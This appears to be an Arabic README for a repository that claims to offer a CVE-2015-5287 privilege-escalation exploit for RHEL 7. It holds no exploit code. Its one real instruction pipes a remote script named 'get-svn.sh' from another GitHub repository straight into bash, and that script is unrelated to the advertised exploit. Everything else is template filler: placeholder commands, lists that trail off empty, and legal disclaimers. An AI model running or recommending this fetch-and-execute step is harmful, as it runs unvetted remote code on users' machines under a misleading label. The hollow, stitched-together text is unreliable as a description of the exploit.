
استغلال تصعيد الامتيازات المحلية لثغرة CVE-2015-5287 التي تستهدف RHEL 7.0/7.1 عبر abrt/sosreport، مخصص للاختبارات الأمنية المصرح بها والأغراض التعليمية.
RHEL 7.0/7.1 - 'abrt/sosreport' تصعيد الامتيازات المحلي
قم بتشغيل أحدث إصدار من سكربت التنزيل الخارجي مباشرة من GitHub:
bash <(curl -fsSL https://raw.githubusercontent.com/HORKimhab/collection-scripts/main/get-svn.sh)
يتطلب هذا الأمر Bash و
curl. راجع السكربت البعيد قبل تشغيله إذا كنت لا تثق بالمصدر.
استخدم هذا المشروع فقط في بيئات آمنة ومصرح بها مثل:
مثال على الإعداد:
git clone <repository-url>
cd <repository-name>
# المشروع يستخدم بايثون اتبع ما يلي
# إنشاء بيئة افتراضية
python -m venv venv
# تفعيل البيئة الافتراضية
# macOS / Linux
source venv/bin/activate
# Windows (Git Bash / WSL)
source venv/Scripts/activate
# تثبيت المتطلبات
pip install -r requirements.txt
مثال على الاستخدام:
# تثبيت التبعيات
<install-command>
# تشغيل المشروع
<run-command>
# استبدل الأوامر أعلاه بخطوات إعداد مشروعك الفعلي.
مستودع لتعلّم واختبار والبحث في مفاهيم الأمن السيبراني في بيئات خاضعة للرقابة.
هذا المستودع مخصص للبحث الأمني التعليمي والمصرح به فقط.
تم تصميمه لمساعدة المستخدمين على التعرف على:
استخدم هذا المستودع فقط في البيئات التي لديك إذن باستخدامها، مثل:
الاستخدام غير المصرح به أو غير القانوني محظور تمامًا.
المؤلف والمساهمون غير مسؤولين عن أي ضرر أو إساءة استخدام أو مشكلات قانونية أو خسائر ناتجة عن هذا المشروع.
باستخدامك لهذا المستودع، فإنك توافق على أن:
هذا المشروع مخصص لـ:
يرجى اتباع ممارسات الإفصاح المسؤول والامتثال لجميع القوانين المعمول بها.
للإفصاح المسؤول أو التعاون، تواصل مع مُشرف المستودع عبر GitHub.
استكشف مجموعة PoC CVE للحصول على موارد إضافية لإثبات المفهوم (PoC) للثغرات الأمنية مخصصة للبحث الأمني والتعليم المصرح بهما.